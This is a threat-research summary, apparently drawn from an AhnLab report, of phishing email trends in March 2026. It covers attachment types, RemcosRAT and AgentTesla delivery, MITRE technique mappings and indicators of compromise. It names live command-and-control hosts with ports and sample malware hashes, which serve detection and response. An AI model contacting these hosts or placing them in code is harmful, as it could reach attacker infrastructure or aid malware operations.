Threat Research

March 2026 Phishing Email Trends Report

Ahnlab
March 2026 Phishing Email Trends Report
Attachment-based trojans were the largest share of attachment-based threats in March 2026 at 21%, while phishing (FakePage) fell to 15% despite only a slight decrease in volume. The report highlights HTML-based phishing and PDF hyperlink abuse, document/compressed-file induced execution, and remote-control malware using C2 channels such as Telegram API tokens and controller.airdns.org:45177. #RemcosRAT #AgentTesla

Keypoints

  • Trojans comprised the largest share of attachment-based threats in March 2026 (21%), followed by phishing (15%), downloaders (9%), and droppers (7%).
  • Phishing activity shifted toward HTML-based pages and PDF hyperlinks used to harvest credentials and redirect victims to fake sites.
  • Script-based threats are dominated by HTML (14%) and JavaScript (11%), and script-type distribution increased month-over-month.
  • Compressed (ZIP 14%, RAR 8%, 7Z 5%) and document (PDF 13%, XLS 5%, DOCX 2%) delivery remain common vectors for RemcosRAT and AgentTesla distribution via decompression or document execution.
  • Adversaries use social engineering tactics such as double extensions and legitimate file names, and impersonate courier/financial organizations like FedEx, DHL, Hana Bank, and Woori Bank.
  • Command-and-control channels observed include Telegram API tokens, controller.airdns.org:45177, and ccp11nl.hyperhost.ua:587, with external mail servers also used as C2.
  • The report includes a top-30 MD5 list of collected malware samples to support detection and response efforts.

MITRE Techniques

  • [T1566 ] Phishing – Use of HTML pages and PDF links to harvest credentials or redirect victims to fake sites (‘phishing uses HTML scripts and PDF hyperlinks to steal login credentials or lead to fake sites.’)
  • [T1566.001 ] Spearphishing Attachment – Attachments delivering trojans, downloaders, and droppers accounted for a large portion of attachment-based threats (‘trojans accounted for the largest share of attachment-based threats in March 2026 at 21%.’)
  • [T1566.002 ] Spearphishing Link – Phishing via embedded links in HTML/PDF to lead victims to fake pages for credential capture (‘phishing uses HTML scripts and PDF hyperlinks to steal login credentials or lead to fake sites.’)
  • [T1204 ] User Execution – Social engineering techniques (double extensions, legitimate file names) used to entice users to open and execute malicious files (‘trojans continue to circulate variants with double extensions and legitimate file names to entice execution.’)
  • [T1105 ] Ingress Tool Transfer – Malware delivered through decompression and execution from archives or documents (e.g., AgentTesla from compressed archive, RemcosRAT from PDF) (‘AgentTesla was distributed by decompressing and executing a textile exporter.’)
  • [T1071 ] Application Layer Protocol – Use of application-layer channels for C2, including Telegram API tokens and external mail servers (‘a Telegram API call token was used as C2.’)
  • [T1036 ] Masquerading – Use of deceptive file names and double extensions to appear legitimate and bypass user suspicion (‘trojans continue to circulate variants with double extensions and legitimate file names to entice execution.’)

Indicators of Compromise

  • [MD5 ] malware file hashes – 06dc18771404694814d6a430bb65d1a3, 0a15c9a545fbf78d77f8c130a3b0f840, and 28 more hashes listed in the report
  • [Domain ] C2 domains and ports – controller.airdns.org:45177, ccp11nl.hyperhost.ua:587
  • [Token ] Telegram API token – used as a C2 channel in script-based phishing cases (‘Telegram API call token’ referenced as C2)
  • [File type/name ] malicious lure files and archives – PDF disguised as an industrial equipment supplier, compressed textile exporter archive (ZIP/RAR) used to deliver AgentTesla

Read more: https://asec.ahnlab.com/en/93465/